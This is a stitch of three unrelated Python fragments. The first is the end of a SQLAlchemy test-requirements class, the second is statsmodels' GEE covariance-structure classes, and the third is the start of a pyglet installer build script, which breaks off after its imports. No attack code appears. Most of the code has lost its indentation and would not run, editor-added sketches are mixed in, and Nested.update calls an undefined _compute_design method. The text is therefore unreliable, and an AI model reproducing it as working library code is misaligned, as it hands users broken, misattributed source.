return exclusions.closed()
@property
def temporary_tables(self):
"""target database supports temporary tables"""
return exclusions.open()
@property
def temporary_views(self):
"""target database supports temporary views"""
return exclusions.closed()
@property
def index_reflection(self):
return exclusions.open()
@property
def unique_constraint_reflection(self):
"""target dialect supports reflection of unique constraints"""
return exclusions.open()
@property
def duplicate_key_raises_integrity_error(self):
"""target dialect raises IntegrityError when reporting an INSERT
with a primary key violation. (hint: it should)
"""
return exclusions.open()
@property
def unbounded_varchar(self):
"""Target database must support VARCHAR with no length"""
return exclusions.open()
@property
def unicode_data(self):
"""Target database/dialect must support Python unicode objects with
non-ASCII characters represented, delivered as bound parameters
as well as in result rows.
"""
return exclusions.open()
@property
def unicode_ddl(self):
"""Target driver must support some degree of non-ascii symbol
names.
"""
return exclusions.closed()
@property
def datetime_literals(self):
"""target dialect supports rendering of a date, time, or datetime as a
literal string, e.g. via the TypeEngine.literal_processor() method.
"""
return exclusions.closed()
@property
def datetime(self):
"""target dialect supports representation of Python
datetime.datetime() objects."""
return exclusions.open()
@property
def datetime_microseconds(self):
"""target dialect supports representation of Python
datetime.datetime() with microsecond objects."""
return exclusions.open()
@property
def datetime_historic(self):
"""target dialect supports representation of Python
datetime.datetime() objects with historic (pre 1970) values."""
return exclusions.closed()
@property
def date(self):
"""target dialect supports representation of Python
datetime.date() objects."""
return exclusions.open()
@property
def date_coerces_from_datetime(self):
"""target dialect accepts a datetime object as the target
of a date column."""
return exclusions.open()
@property
def date_historic(self):
"""target dialect supports representation of Python
datetime.datetime() objects with historic (pre 1970) values."""
return exclusions.closed()
@property
def time(self):
"""target dialect supports representation of Python
datetime.time() objects."""
return exclusions.open()
@property
def time_microseconds(self):
"""target dialect supports representation of Python
datetime.time() with microsecond objects."""
return exclusions.open()
@property
def binary_comparisons(self):
"""target database/driver can allow BLOB/BINARY fields to be compared
against a bound parameter value.
"""
return exclusions.open()
@property
def binary_literals(self):
"""target backend supports simple binary literals, e.g. an
expression like::
SELECT CAST('foo' AS BINARY)
Where ``BINARY`` is the type emitted from :class:`.LargeBinary`,
e.g. it could be ``BLOB`` or similar.
Basically fails on Oracle.
"""
return exclusions.open()
@property
def json_type(self):
"""target platform implements a native JSON type."""
return exclusions.closed()
@property
def json_array_indexes(self):
""""target platform supports numeric array indexes
within a JSON structure"""
return self.json_type
@property
def precision_numerics_general(self):
"""target backend has general support for moderately high-precision
numerics."""
return exclusions.open()
@property
def precision_numerics_enotation_small(self):
"""target backend supports Decimal() objects using E notation
to represent very small values."""
return exclusions.closed()
@property
def precision_numerics_enotation_large(self):
"""target backend supports Decimal() objects using E notation
to represent very large values."""
return exclusions.closed()
@property
def precision_numerics_many_significant_digits(self):
"""target backend supports values with many digits on both sides,
such as 319438950232418390.273596, 87673.594069654243
"""
return exclusions.closed()
@property
def precision_numerics_retains_significant_digits(self):
"""A precision numeric type will return empty significant digits,
i.e. a value such as 10.000 will come back in Decimal form with
the .000 maintained."""
return exclusions.closed()
@property
def precision_generic_float_type(self):
"""target backend will return native floating point numbers with at
least seven decimal places when using the generic Float type.
"""
return exclusions.open()
@property
def floats_to_four_decimals(self):
"""target backend can return a floating-point number with four
significant digits (such as 15.7563) accurately
(i.e. without FP inaccuracies, such as 15.75629997253418).
"""
return exclusions.open()
@property
def fetch_null_from_numeric(self):
"""target backend doesn't crash when you try to select a NUMERIC
value that has a value of NULL.
Added to support Pyodbc bug #351.
"""
return exclusions.open()
@property
def text_type(self):
"""Target database must support an unbounded Text() "
"type such as TEXT or CLOB"""
return exclusions.open()
@property
def empty_strings_varchar(self):
"""target database can persist/return an empty string with a
varchar.
"""
return exclusions.open()
@property
def empty_strings_text(self):
"""target database can persist/return an empty string with an
unbounded text."""
return exclusions.open()
@property
def selectone(self):
"""target driver must support the literal statement 'select 1'"""
return exclusions.open()
@property
def savepoints(self):
"""Target database must support savepoints."""
return exclusions.closed()
@property
def two_phase_transactions(self):
"""Target database must support two-phase transactions."""
return exclusions.closed()
@property
def update_from(self):
"""Target must support UPDATE..FROM syntax"""
return exclusions.closed()
@property
def update_where_target_in_subquery(self):
"""Target must support UPDATE where the same table is present in a
subquery in the WHERE clause.
This is an ANSI-standard syntax that apparently MySQL can't handle,
such as:
UPDATE documents SET flag=1 WHERE documents.title IN
(SELECT max(documents.title) AS title
FROM documents GROUP BY documents.user_id
)
"""
return exclusions.open()
@property
def mod_operator_as_percent_sign(self):
"""target database must use a plain percent '%' as the 'modulus'
operator."""
return exclusions.closed()
@property
def percent_schema_names(self):
"""target backend supports weird identifiers with percent signs
in them, e.g. 'some % column'.
this is a very weird use case but often has problems because of
DBAPIs that use python formatting. It's not a critical use
case either.
"""
return exclusions.closed()
@property
def order_by_label_with_expression(self):
"""target backend supports ORDER BY a column label within an
expression.
Basically this::
select data as foo from test order by foo || 'bar'
Lots of databases including Postgresql don't support this,
so this is off by default.
"""
return exclusions.closed()
@property
def unicode_connections(self):
"""Target driver must support non-ASCII characters being passed at
all.
"""
return exclusions.open()
@property
def graceful_disconnects(self):
"""Target driver must raise a DBAPI-level exception, such as
InterfaceError, when the underlying connection has been closed
and the execute() method is called.
"""
return exclusions.open()
@property
def skip_mysql_on_windows(self):
"""Catchall for a large variety of MySQL on Windows failures"""
return exclusions.open()
@property
def ad_hoc_engines(self):
"""Test environment must allow ad-hoc engine/connection creation.
DBs that scale poorly for many connections, even when closed, i.e.
Oracle, may use the "--low-connections" option which flags this
requirement as not present.
"""
return exclusions.skip_if(
lambda config: config.options.low_connections)
@property
def timing_intensive(self):
return exclusions.requires_tag("timing_intensive")
@property
def memory_intensive(self):
return exclusions.requires_tag("memory_intensive")
@property
def threading_with_mock(self):
"""Mark tests that use threading and mock at the same time - stability
issues have been observed with coverage + python 3.3
"""
return exclusions.skip_if(
lambda config: util.py3k and config.options.has_coverage,
"Stability issues with coverage + py3k"
)
@property
def python2(self):
return exclusions.skip_if(
lambda: sys.version_info >= (3,),
"Python version 2.xx is required."
)
@property
def python3(self):
return exclusions.skip_if(
lambda: sys.version_info < (3,),
"Python version 3.xx is required."
)
@property
def cpython(self):
return exclusions.only_if(
lambda: util.cpython,
"cPython interpreter needed"
)
@property
def non_broken_pickle(self):
from sqlalchemy.util import pickle
return exclusions.only_if(
            lambda: (not util.pypy and pickle.__name__ == 'cPickle')
            or sys.version_info >= (3, 2),
"Needs cPickle+cPython or newer Python 3 pickle"
)
@property
def predictable_gc(self):
"""target platform must remove all cycles unconditionally when
gc.collect() is called, as well as clean out unreferenced subclasses.
"""
return self.cpython
@property
def no_coverage(self):
"""Test should be skipped if coverage is enabled.
This is to block tests that exercise libraries that seem to be
sensitive to coverage, such as Postgresql notice logging.
"""
return exclusions.skip_if(
lambda config: config.options.has_coverage,
"Issues observed when coverage is enabled"
)
def _has_mysql_on_windows(self, config):
return False
def _has_mysql_fully_case_sensitive(self, config):
return False
@property
def sqlite(self):
return exclusions.skip_if(lambda: not self._has_sqlite())
@property
def cextensions(self):
return exclusions.skip_if(
lambda: not self._has_cextensions(), "C extensions not installed"
)
def _has_sqlite(self):
from sqlalchemy import create_engine
try:
create_engine('sqlite://')
return True
except ImportError:
return False
def _has_cextensions(self):
try:
from sqlalchemy import cresultproxy, cprocessors
return True
except ImportError:
return False
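# Editor's sketch, not part of the SQLAlchemy source: as the module docstring
# notes, external dialect test suites subclass SuiteRequirements to declare
# what the target backend supports.  A hypothetical dialect might override
# individual properties like this:
class ExampleDialectRequirements(SuiteRequirements):
    @property
    def returning(self):
        # Suppose the hypothetical backend has no RETURNING support.
        return exclusions.closed()
    @property
    def window_functions(self):
        # ...but does support window functions.
        return exclusions.open()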
|
|
from statsmodels.compat.python import iterkeys, itervalues, zip, range
from statsmodels.stats.correlation_tools import cov_nearest
import numpy as np
from scipy import linalg as spl
from statsmodels.tools.sm_exceptions import (ConvergenceWarning,
IterationLimitWarning)
import warnings
class CovStruct(object):
"""
A base class for correlation and covariance structures of grouped
data.
Each implementation of this class takes the residuals from a
regression model that has been fitted to grouped data, and uses
them to estimate the within-group dependence structure of the
random errors in the model.
The state of the covariance structure is represented through the
value of the class variable `dep_params`. The default state of a
newly-created instance should correspond to the identity
correlation matrix.
"""
def __init__(self, cov_nearest_method="clipped"):
# Parameters describing the dependency structure
self.dep_params = None
# Keep track of the number of times that the covariance was
# adjusted.
self.cov_adjust = []
        # Method for projecting the covariance matrix if it is not SPD.
self.cov_nearest_method = cov_nearest_method
def initialize(self, model):
"""
Called by GEE, used by implementations that need additional
setup prior to running `fit`.
Parameters
----------
model : GEE class
A reference to the parent GEE class instance.
"""
self.model = model
def update(self, params):
"""
Updates the association parameter values based on the current
regression coefficients.
Parameters
----------
params : array-like
Working values for the regression parameters.
"""
raise NotImplementedError
def covariance_matrix(self, endog_expval, index):
"""
Returns the working covariance or correlation matrix for a
given cluster of data.
Parameters
----------
endog_expval: array-like
The expected values of endog for the cluster for which the
covariance or correlation matrix will be returned
index: integer
            The index of the cluster for which the covariance or
correlation matrix will be returned
Returns
-------
M: matrix
The covariance or correlation matrix of endog
is_cor: bool
True if M is a correlation matrix, False if M is a
covariance matrix
"""
raise NotImplementedError
def covariance_matrix_solve(self, expval, index, stdev, rhs):
"""
Solves matrix equations of the form `covmat * soln = rhs` and
returns the values of `soln`, where `covmat` is the covariance
matrix represented by this class.
Parameters
----------
expval: array-like
The expected value of endog for each observed value in the
group.
index: integer
The group index.
stdev : array-like
The standard deviation of endog for each observation in
the group.
rhs : list/tuple of array-like
A set of right-hand sides; each defines a matrix equation
to be solved.
Returns
-------
soln : list/tuple of array-like
The solutions to the matrix equations.
Notes
-----
Returns None if the solver fails.
Some dependence structures do not use `expval` and/or `index`
to determine the correlation matrix. Some families
(e.g. binomial) do not use the `stdev` parameter when forming
the covariance matrix.
If the covariance matrix is singular or not SPD, it is
projected to the nearest such matrix. These projection events
are recorded in the fit_history member of the GEE model.
Systems of linear equations with the covariance matrix as the
left hand side (LHS) are solved for different right hand sides
(RHS); the LHS is only factorized once to save time.
        This is a default implementation; it can be reimplemented in
        subclasses to optimize the linear algebra according to the
        structure of the covariance matrix.
"""
vmat, is_cor = self.covariance_matrix(expval, index)
if is_cor:
vmat *= np.outer(stdev, stdev)
# Factor the covariance matrix. If the factorization fails,
# attempt to condition it into a factorizable matrix.
threshold = 1e-2
success = False
cov_adjust = 0
for itr in range(20):
try:
vco = spl.cho_factor(vmat)
success = True
break
except np.linalg.LinAlgError:
vmat = cov_nearest(vmat, method=self.cov_nearest_method,
threshold=threshold)
threshold *= 2
cov_adjust += 1
self.cov_adjust.append(cov_adjust)
# Last resort if we still can't factor the covariance matrix.
        if not success:
warnings.warn("Unable to condition covariance matrix to an SPD matrix using cov_nearest",
ConvergenceWarning)
vmat = np.diag(np.diag(vmat))
vco = spl.cho_factor(vmat)
soln = [spl.cho_solve(vco, x) for x in rhs]
return soln
def summary(self):
"""
Returns a text summary of the current estimate of the
dependence structure.
"""
raise NotImplementedError
class Independence(CovStruct):
"""
An independence working dependence structure.
"""
# Nothing to update
def update(self, params):
return
def covariance_matrix(self, expval, index):
dim = len(expval)
return np.eye(dim, dtype=np.float64), True
def covariance_matrix_solve(self, expval, index, stdev, rhs):
v = stdev**2
rslt = []
for x in rhs:
if x.ndim == 1:
rslt.append(x / v)
else:
rslt.append(x / v[:, None])
return rslt
update.__doc__ = CovStruct.update.__doc__
covariance_matrix.__doc__ = CovStruct.covariance_matrix.__doc__
covariance_matrix_solve.__doc__ = CovStruct.covariance_matrix_solve.__doc__
def summary(self):
return "Observations within a cluster are modeled as being independent."
class Exchangeable(CovStruct):
"""
An exchangeable working dependence structure.
"""
def __init__(self):
super(Exchangeable, self).__init__()
# The correlation between any two values in the same cluster
self.dep_params = 0.
def update(self, params):
endog = self.model.endog_li
nobs = self.model.nobs
dim = len(params)
varfunc = self.model.family.variance
cached_means = self.model.cached_means
residsq_sum, scale, nterm = 0, 0, 0
for i in range(self.model.num_group):
expval, _ = cached_means[i]
stdev = np.sqrt(varfunc(expval))
resid = (endog[i] - expval) / stdev
ngrp = len(resid)
residsq = np.outer(resid, resid)
scale += np.trace(residsq)
residsq = np.tril(residsq, -1)
residsq_sum += residsq.sum()
nterm += 0.5 * ngrp * (ngrp - 1)
scale /= (nobs - dim)
self.dep_params = residsq_sum / (scale * (nterm - dim))
def covariance_matrix(self, expval, index):
dim = len(expval)
dp = self.dep_params * np.ones((dim, dim), dtype=np.float64)
return dp + (1. - self.dep_params) * np.eye(dim), True
def covariance_matrix_solve(self, expval, index, stdev, rhs):
k = len(expval)
c = self.dep_params / (1. - self.dep_params)
c /= 1. + self.dep_params * (k - 1)
rslt = []
for x in rhs:
if x.ndim == 1:
x1 = x / stdev
y = x1 / (1. - self.dep_params)
y -= c * sum(x1)
y /= stdev
else:
x1 = x / stdev[:, None]
y = x1 / (1. - self.dep_params)
y -= c * x1.sum(0)
y /= stdev[:, None]
rslt.append(y)
return rslt
update.__doc__ = CovStruct.update.__doc__
covariance_matrix.__doc__ = CovStruct.covariance_matrix.__doc__
covariance_matrix_solve.__doc__ = CovStruct.covariance_matrix_solve.__doc__
def summary(self):
return ("The correlation between two observations in the " +
"same cluster is %.3f" % self.dep_params)
class Nested(CovStruct):
"""
A nested working dependence structure.
A working dependence structure that captures a nested hierarchy of
groups, each level of which contributes to the random error term
of the model.
When using this working covariance structure, `dep_data` of the
GEE instance should contain a n_obs x k matrix of 0/1 indicators,
corresponding to the k subgroups nested under the top-level
`groups` of the GEE instance. These subgroups should be nested
from left to right, so that two observations with the same value
for column j of `dep_data` should also have the same value for all
columns j' < j (this only applies to observations in the same
top-level cluster given by the `groups` argument to GEE).
Example
-------
Suppose our data are student test scores, and the students are in
classrooms, nested in schools, nested in school districts. The
school district is the highest level of grouping, so the school
district id would be provided to GEE as `groups`, and the school
and classroom id's would be provided to the Nested class as the
`dep_data` argument, e.g.
0 0 # School 0, classroom 0, student 0
0 0 # School 0, classroom 0, student 1
0 1 # School 0, classroom 1, student 0
0 1 # School 0, classroom 1, student 1
1 0 # School 1, classroom 0, student 0
1 0 # School 1, classroom 0, student 1
1 1 # School 1, classroom 1, student 0
1 1 # School 1, classroom 1, student 1
Labels lower in the hierarchy are recycled, so that student 0 in
    classroom 0 is different from student 0 in classroom 1, etc.
Notes
-----
The calculations for this dependence structure involve all pairs
of observations within a group (that is, within the top level
`group` structure passed to GEE). Large group sizes will result
in slow iterations.
The variance components are estimated using least squares
regression of the products r*r', for standardized residuals r and
r' in the same group, on a vector of indicators defining which
variance components are shared by r and r'.
"""
def initialize(self, model):
"""
Called on the first call to update
`ilabels` is a list of n_i x n_i matrices containing integer
labels that correspond to specific correlation parameters.
Two elements of ilabels[i] with the same label share identical
variance components.
`designx` is a matrix, with each row containing dummy
variables indicating which variance components are associated
with the corresponding element of QY.
"""
super(Nested, self).initialize(model)
# A bit of processing of the nest data
id_matrix = np.asarray(self.model.dep_data)
if id_matrix.ndim == 1:
id_matrix = id_matrix[:,None]
self.id_matrix = id_matrix
endog = self.model.endog_li
designx, ilabels = [], []
# The number of layers of nesting
n_nest = self.id_matrix.shape[1]
for i in range(self.model.num_group):
ngrp = len(endog[i])
glab = self.model.group_labels[i]
rix = self.model.group_indices[glab]
# Determine the number of common variance components
# shared by each pair of observations.
ix1, ix2 = np.tril_indices(ngrp, -1)
ncm = (self.id_matrix[rix[ix1], :] ==
self.id_matrix[rix[ix2], :]).sum(1)
# This is used to construct the working correlation
# matrix.
ilabel = np.zeros((ngrp, ngrp), dtype=np.int32)
            ilabel[ix1, ix2] = ncm + 1
            ilabel[ix2, ix1] = ncm + 1
ilabels.append(ilabel)
# This is used to estimate the variance components.
dsx = np.zeros((len(ix1), n_nest+1), dtype=np.float64)
dsx[:,0] = 1
for k in np.unique(ncm):
ii = np.flatnonzero(ncm == k)
dsx[ii, 1:k+1] = 1
designx.append(dsx)
self.designx = np.concatenate(designx, axis=0)
self.ilabels = ilabels
svd = np.linalg.svd(self.designx, 0)
self.designx_u = svd[0]
self.designx_s = svd[1]
self.designx_v = svd[2].T
def update(self, params):
endog = self.model.endog_li
offset = self.model.offset_li
nobs = self.model.nobs
dim = len(params)
if self.designx is None:
self._compute_design(self.model)
cached_means = self.model.cached_means
varfunc = self.model.family.variance
dvmat = []
scale = 0.
for i in range(self.model.num_group):
expval, _ = cached_means[i]
stdev = np.sqrt(varfunc(expval))
resid = (endog[i] - offset[i] - expval) / stdev
ix1, ix2 = np.tril_indices(len(resid), -1)
dvmat.append(resid[ix1] * resid[ix2])
scale += np.sum(resid**2)
dvmat = np.concatenate(dvmat)
scale /= (nobs - dim)
# Use least squares regression to estimate the variance
# components
vcomp_coeff = np.dot(self.designx_v, np.dot(self.designx_u.T,
dvmat) / self.designx_s)
self.vcomp_coeff = np.clip(vcomp_coeff, 0, np.inf)
self.scale = scale
self.dep_params = self.vcomp_coeff.copy()
def covariance_matrix(self, expval, index):
dim = len(expval)
# First iteration
if self.dep_params is None:
return np.eye(dim, dtype=np.float64), True
ilabel = self.ilabels[index]
c = np.r_[self.scale, np.cumsum(self.vcomp_coeff)]
vmat = c[ilabel]
vmat /= self.scale
return vmat, True
update.__doc__ = CovStruct.update.__doc__
covariance_matrix.__doc__ = CovStruct.covariance_matrix.__doc__
def summary(self):
"""
Returns a summary string describing the state of the
dependence structure.
"""
msg = "Variance estimates\n------------------\n"
for k in range(len(self.vcomp_coeff)):
msg += "Component %d: %.3f\n" % (k+1, self.vcomp_coeff[k])
msg += "Residual: %.3f\n" % (self.scale -
np.sum(self.vcomp_coeff))
return msg
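# Editor's sketch (not part of statsmodels): how the school/classroom layout in
# the docstring above could be passed to a GEE model.  The variable names and
# the exact GEE call below are illustrative assumptions.
def _nested_usage_example(endog, exog, district, school, classroom):
    import statsmodels.api as sm   # local import; avoids a circular import here
    dep_data = np.column_stack([school, classroom])
    model = sm.GEE(endog, exog, groups=district,
                   cov_struct=Nested(), dep_data=dep_data)
    return model.fit()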
class Autoregressive(CovStruct):
"""
An autoregressive working dependence structure.
The dependence is defined in terms of the `time` component of the
parent GEE class. Time represents a potentially multidimensional
index from which distances between pairs of observations can be
determined. The correlation between two observations in the same
cluster is dep_params^distance, where `dep_params` is the
autocorrelation parameter to be estimated, and `distance` is the
distance between the two observations, calculated from their
corresponding time values. `time` is stored as an n_obs x k
matrix, where `k` represents the number of dimensions in the time
index.
The autocorrelation parameter is estimated using weighted
nonlinear least squares, regressing each value within a cluster on
    each preceding value in the same cluster.
Parameters
----------
dist_func: function from R^k x R^k to R^+, optional
A function that computes the distance between the two
observations based on their `time` values.
Reference
---------
B Rosner, A Munoz. Autoregressive modeling for the analysis of
longitudinal data with unequally spaced examinations. Statistics
in medicine. Vol 7, 59-71, 1988.
"""
def __init__(self, dist_func=None):
super(Autoregressive, self).__init__()
# The function for determining distances based on time
if dist_func is None:
self.dist_func = lambda x, y: np.abs(x - y).sum()
else:
self.dist_func = dist_func
self.designx = None
# The autocorrelation parameter
self.dep_params = 0.
def update(self, params):
endog = self.model.endog_li
time = self.model.time_li
# Only need to compute this once
if self.designx is not None:
designx = self.designx
else:
designx = []
for i in range(self.model.num_group):
ngrp = len(endog[i])
if ngrp == 0:
continue
# Loop over pairs of observations within a cluster
for j1 in range(ngrp):
for j2 in range(j1):
designx.append(self.dist_func(time[i][j1, :],
time[i][j2, :]))
designx = np.array(designx)
self.designx = designx
scale = self.model.estimate_scale()
varfunc = self.model.family.variance
cached_means = self.model.cached_means
# Weights
var = 1. - self.dep_params**(2*designx)
var /= 1. - self.dep_params**2
wts = 1. / var
wts /= wts.sum()
residmat = []
for i in range(self.model.num_group):
expval, _ = cached_means[i]
stdev = np.sqrt(scale * varfunc(expval))
resid = (endog[i] - expval) / stdev
ngrp = len(resid)
for j1 in range(ngrp):
for j2 in range(j1):
residmat.append([resid[j1], resid[j2]])
residmat = np.array(residmat)
# Need to minimize this
def fitfunc(a):
dif = residmat[:, 0] - (a**designx)*residmat[:, 1]
return np.dot(dif**2, wts)
# Left bracket point
b_lft, f_lft = 0., fitfunc(0.)
# Center bracket point
b_ctr, f_ctr = 0.5, fitfunc(0.5)
while f_ctr > f_lft:
b_ctr /= 2
f_ctr = fitfunc(b_ctr)
if b_ctr < 1e-8:
self.dep_params = 0
return
# Right bracket point
b_rgt, f_rgt = 0.75, fitfunc(0.75)
while f_rgt < f_ctr:
b_rgt = b_rgt + (1. - b_rgt) / 2
f_rgt = fitfunc(b_rgt)
if b_rgt > 1. - 1e-6:
raise ValueError(
"Autoregressive: unable to find right bracket")
from scipy.optimize import brent
self.dep_params = brent(fitfunc, brack=[b_lft, b_ctr, b_rgt])
def covariance_matrix(self, endog_expval, index):
ngrp = len(endog_expval)
if self.dep_params == 0:
return np.eye(ngrp, dtype=np.float64), True
idx = np.arange(ngrp)
cmat = self.dep_params**np.abs(idx[:, None] - idx[None, :])
return cmat, True
def covariance_matrix_solve(self, expval, index, stdev, rhs):
# The inverse of an AR(1) covariance matrix is tri-diagonal.
k = len(expval)
soln = []
# LHS has 1 column
if k == 1:
return [x / stdev**2 for x in rhs]
# LHS has 2 columns
if k == 2:
mat = np.array([[1, -self.dep_params], [-self.dep_params, 1]])
mat /= (1. - self.dep_params**2)
for x in rhs:
if x.ndim == 1:
x1 = x / stdev
else:
x1 = x / stdev[:, None]
x1 = np.dot(mat, x1)
if x.ndim == 1:
x1 /= stdev
else:
x1 /= stdev[:, None]
soln.append(x1)
return soln
# LHS has >= 3 columns: values c0, c1, c2 defined below give
# the inverse. c0 is on the diagonal, except for the first
# and last position. c1 is on the first and last position of
# the diagonal. c2 is on the sub/super diagonal.
c0 = (1. + self.dep_params**2) / (1. - self.dep_params**2)
c1 = 1. / (1. - self.dep_params**2)
c2 = -self.dep_params / (1. - self.dep_params**2)
soln = []
for x in rhs:
flatten = False
if x.ndim == 1:
x = x[:, None]
flatten = True
x1 = x / stdev[:, None]
z0 = np.zeros((1, x.shape[1]))
            rhs1 = np.concatenate((x1[1:,:], z0), axis=0)
            rhs2 = np.concatenate((z0, x1[0:-1,:]), axis=0)
            y = c0*x1 + c2*rhs1 + c2*rhs2
            y[0, :] = c1*x1[0, :] + c2*x1[1, :]
            y[-1, :] = c1*x1[-1, :] + c2*x1[-2, :]
y /= stdev[:, None]
if flatten:
y = np.squeeze(y)
soln.append(y)
return soln
update.__doc__ = CovStruct.update.__doc__
covariance_matrix.__doc__ = CovStruct.covariance_matrix.__doc__
covariance_matrix_solve.__doc__ = CovStruct.covariance_matrix_solve.__doc__
def summary(self):
return ("Autoregressive(1) dependence parameter: %.3f\n" %
self.dep_params)
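# Editor's sketch (not part of statsmodels): with unit standard deviations the
# working covariance equals the AR(1) correlation matrix, so the tri-diagonal
# solve above can be checked against a dense solve.  Values are illustrative.
def _ar1_solve_example():
    ar = Autoregressive()
    ar.dep_params = 0.4
    expval = np.zeros(5)                     # only its length is used here
    stdev = np.ones(5)
    rhs_vec = np.array([1.0, -2.0, 0.5, 3.0, 1.5])
    cormat, _ = ar.covariance_matrix(expval, 0)
    (soln,) = ar.covariance_matrix_solve(expval, 0, stdev, [rhs_vec])
    assert np.allclose(soln, np.linalg.solve(cormat, rhs_vec))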
class GlobalOddsRatio(CovStruct):
"""
Estimate the global odds ratio for a GEE with ordinal or nominal
data.
References
----------
PJ Heagerty and S Zeger. "Marginal Regression Models for Clustered
Ordinal Measurements". Journal of the American Statistical
Association Vol. 91, Issue 435 (1996).
Thomas Lumley. Generalized Estimating Equations for Ordinal Data:
A Note on Working Correlation Structures. Biometrics Vol. 52,
No. 1 (Mar., 1996), pp. 354-361
http://www.jstor.org/stable/2533173
    Notes
    -----
The following data structures are calculated in the class:
'ibd' is a list whose i^th element ibd[i] is a sequence of integer
pairs (a,b), where endog_li[i][a:b] is the subvector of binary
indicators derived from the same ordinal value.
`cpp` is a dictionary where cpp[group] is a map from cut-point
pairs (c,c') to the indices of all between-subject pairs derived
from the given cut points.
"""
def __init__(self, endog_type):
super(GlobalOddsRatio, self).__init__()
self.endog_type = endog_type
self.dep_params = 0.
def initialize(self, model):
super(GlobalOddsRatio, self).initialize(model)
self.nlevel = len(model.endog_values)
self.ncut = self.nlevel - 1
ibd = []
for v in model.endog_li:
jj = np.arange(0, len(v) + 1, self.ncut)
            ibd1 = [(jj[k], jj[k + 1]) for k in range(len(jj) - 1)]
ibd.append(ibd1)
self.ibd = ibd
# Need to restrict to between-subject pairs
cpp = []
for v in model.endog_li:
# Number of subjects in this group
m = int(len(v) / self.ncut)
cpp1 = {}
# Loop over distinct subject pairs
for i1 in range(m):
for i2 in range(i1):
# Loop over cut point pairs
for k1 in range(self.ncut):
for k2 in range(k1+1):
if (k2, k1) not in cpp1:
cpp1[(k2, k1)] = []
j1 = i1*self.ncut + k1
j2 = i2*self.ncut + k2
cpp1[(k2, k1)].append([j2, j1])
for k in cpp1.keys():
cpp1[k] = np.asarray(cpp1[k])
cpp.append(cpp1)
self.cpp = cpp
# Initialize the dependence parameters
self.crude_or = self.observed_crude_oddsratio()
self.dep_params = self.crude_or
def pooled_odds_ratio(self, tables):
"""
Returns the pooled odds ratio for a list of 2x2 tables.
The pooled odds ratio is the inverse variance weighted average
of the sample odds ratios of the tables.
"""
if len(tables) == 0:
return 1.
# Get the sampled odds ratios and variances
log_oddsratio, var = [], []
for table in tables:
lor = np.log(table[1, 1]) + np.log(table[0, 0]) -\
np.log(table[0, 1]) - np.log(table[1, 0])
log_oddsratio.append(lor)
var.append((1 / table.astype(np.float64)).sum())
# Calculate the inverse variance weighted average
wts = [1 / v for v in var]
wtsum = sum(wts)
wts = [w / wtsum for w in wts]
log_pooled_or = sum([w*e for w, e in zip(wts, log_oddsratio)])
return np.exp(log_pooled_or)
def covariance_matrix(self, expected_value, index):
vmat = self.get_eyy(expected_value, index)
vmat -= np.outer(expected_value, expected_value)
return vmat, False
def observed_crude_oddsratio(self):
"""
To obtain the crude (global) odds ratio, first pool all binary
indicators corresponding to a given pair of cut points (c,c'),
then calculate the odds ratio for this 2x2 table. The crude
odds ratio is the inverse variance weighted average of these
odds ratios. Since the covariate effects are ignored, this OR
will generally be greater than the stratified OR.
"""
cpp = self.cpp
endog = self.model.endog_li
# Storage for the contingency tables for each (c,c')
tables = {}
for ii in iterkeys(cpp[0]):
tables[ii] = np.zeros((2, 2), dtype=np.float64)
# Get the observed crude OR
for i in range(len(endog)):
# The observed joint values for the current cluster
yvec = endog[i]
endog_11 = np.outer(yvec, yvec)
endog_10 = np.outer(yvec, 1. - yvec)
endog_01 = np.outer(1. - yvec, yvec)
endog_00 = np.outer(1. - yvec, 1. - yvec)
cpp1 = cpp[i]
for ky in iterkeys(cpp1):
ix = cpp1[ky]
tables[ky][1, 1] += endog_11[ix[:, 0], ix[:, 1]].sum()
tables[ky][1, 0] += endog_10[ix[:, 0], ix[:, 1]].sum()
tables[ky][0, 1] += endog_01[ix[:, 0], ix[:, 1]].sum()
tables[ky][0, 0] += endog_00[ix[:, 0], ix[:, 1]].sum()
return self.pooled_odds_ratio(list(itervalues(tables)))
def get_eyy(self, endog_expval, index):
"""
Returns a matrix V such that V[i,j] is the joint probability
that endog[i] = 1 and endog[j] = 1, based on the marginal
probabilities of endog and the global odds ratio `current_or`.
"""
current_or = self.dep_params
ibd = self.ibd[index]
# The between-observation joint probabilities
if current_or == 1.0:
vmat = np.outer(endog_expval, endog_expval)
else:
psum = endog_expval[:, None] + endog_expval[None, :]
pprod = endog_expval[:, None] * endog_expval[None, :]
pfac = np.sqrt((1. + psum * (current_or - 1.))**2 +
4 * current_or * (1. - current_or) * pprod)
vmat = 1. + psum * (current_or - 1.) - pfac
vmat /= 2. * (current_or - 1)
# Fix E[YY'] for elements that belong to same observation
for bdl in ibd:
evy = endog_expval[bdl[0]:bdl[1]]
if self.endog_type == "ordinal":
eyr = np.outer(evy, np.ones(len(evy)))
eyc = np.outer(np.ones(len(evy)), evy)
vmat[bdl[0]:bdl[1], bdl[0]:bdl[1]] = \
np.where(eyr < eyc, eyr, eyc)
else:
vmat[bdl[0]:bdl[1], bdl[0]:bdl[1]] = np.diag(evy)
return vmat
def update(self, params):
"""
Update the global odds ratio based on the current value of
params.
"""
endog = self.model.endog_li
cpp = self.cpp
cached_means = self.model.cached_means
# This will happen if all the clusters have only
# one observation
if len(cpp[0]) == 0:
return
tables = {}
for ii in cpp[0]:
tables[ii] = np.zeros((2, 2), dtype=np.float64)
for i in range(self.model.num_group):
endog_expval, _ = cached_means[i]
emat_11 = self.get_eyy(endog_expval, i)
emat_10 = endog_expval[:, None] - emat_11
emat_01 = -emat_11 + endog_expval
emat_00 = 1. - (emat_11 + emat_10 + emat_01)
cpp1 = cpp[i]
for ky in iterkeys(cpp1):
ix = cpp1[ky]
tables[ky][1, 1] += emat_11[ix[:, 0], ix[:, 1]].sum()
tables[ky][1, 0] += emat_10[ix[:, 0], ix[:, 1]].sum()
tables[ky][0, 1] += emat_01[ix[:, 0], ix[:, 1]].sum()
tables[ky][0, 0] += emat_00[ix[:, 0], ix[:, 1]].sum()
cor_expval = self.pooled_odds_ratio(list(itervalues(tables)))
self.dep_params *= self.crude_or / cor_expval
if not np.isfinite(self.dep_params):
self.dep_params = 1.
warnings.warn("dep_params became inf, resetting to 1",
ConvergenceWarning)
update.__doc__ = CovStruct.update.__doc__
covariance_matrix.__doc__ = CovStruct.covariance_matrix.__doc__
def summary(self):
return "Global odds ratio: %.3f\n" % self.dep_params
|
|
# Build script for the pyglet Windows installer:
# 1. Copy avbin.dll into res/
# 2. Create pyglet.wxs from pyglet.in.wxs, adding all file components
# 3. Run candle and light on pyglet.wxs to generate
#    ../../dist/pyglet-<version>.msi
import os
import re
import shutil
import subprocess
from uuid import uuid1
from xml.dom.minidom import parse
